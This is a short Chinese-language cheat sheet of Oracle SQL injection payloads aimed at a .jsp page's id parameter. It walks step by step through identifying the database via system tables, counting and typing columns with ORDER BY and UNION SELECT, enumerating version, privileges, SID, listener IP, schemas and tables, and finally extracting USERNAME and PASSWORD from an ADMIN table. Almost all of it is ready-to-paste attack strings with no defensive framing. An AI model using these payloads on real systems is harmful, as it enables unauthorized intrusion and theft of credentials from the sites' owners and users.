1判断是什么数据库
and exist(select * from dual)
and exists(select * from user_tables)
原理:dual表和user_tables表是oracle中的系统表返回正常,那么就可以肯定这是oracle。
2查字段数
order by 10-- //错误,列数小于10
order by 3-- //正常,列数等于或大于3
3判断字段类型
.jsp?id=1 union select NULL,NULL,NULL from dual-- /*正常说明有3个字段*/
and 1=2 union select NULL,NULL,'string' from dual-- //正常,第三个字段是字符型
下面替换“string”,记得带括号
数据库与版本 (SELECT banner FROM sys.v_$version WHERE ROWNUM=1)
当前用户权限 (SELECT * FROM session_roles WHERE ROWNUM=1)
数据库名 (Select name From v$database)
当前库所有表 (Select table_name From all_tables)
服务器系统 (select member from v$logfile where rownum=1)
服务器监听IP (select utl_inaddr.get_host_address from dual)
数据库SID (select instance_name from v$instance)
4获取所有数据库名
id=1 and 1=2 union select NULL,(select global_name from global_name),NULL from dual--
id=1 and 1=2 union select NULL,(select sys.database_name from dual),NULL from dual--
id=1 and 1=2 union select NULL,(select name from v$database),NULL from dual--
第一个库名
id=1 and 1=2 union select NULL,(select owner from all_tables where rownum=1),NULL from dual--
第二个库名
id=1 and 1=2 union select NULL,(select owner from all_tables where owner<>'SYS' and rownum=1),NULL from dual--
第三个库名
id=1 and 1=2 union select NULL,(select owner from all_tables where owner<>'SYS' and owner<>'SYSTEM' and rownum=1),NULL from dual--
查到的第一个是SYS,那么查第二个的时候就把SYS排除,比如第二个查出的是SYSTEM,那么第三个就排除前两个
当前表名
id=1 and 1=2 union select NULL,(select table_name from user_tables where rownum=1),NULL from dual--
剩下的表名
id=1 and 1=2 union select NULL,(select table_name from user_tables where rownum=1 and table_name<>'ADMIN'),NULL from dual--
使用<>'表名'不断添加要排除的表名查询,表名区分大小写。
5查询字段内容
id=1 and 1=2 union select NULL,USERNAME,PASSWORD from ADMIN—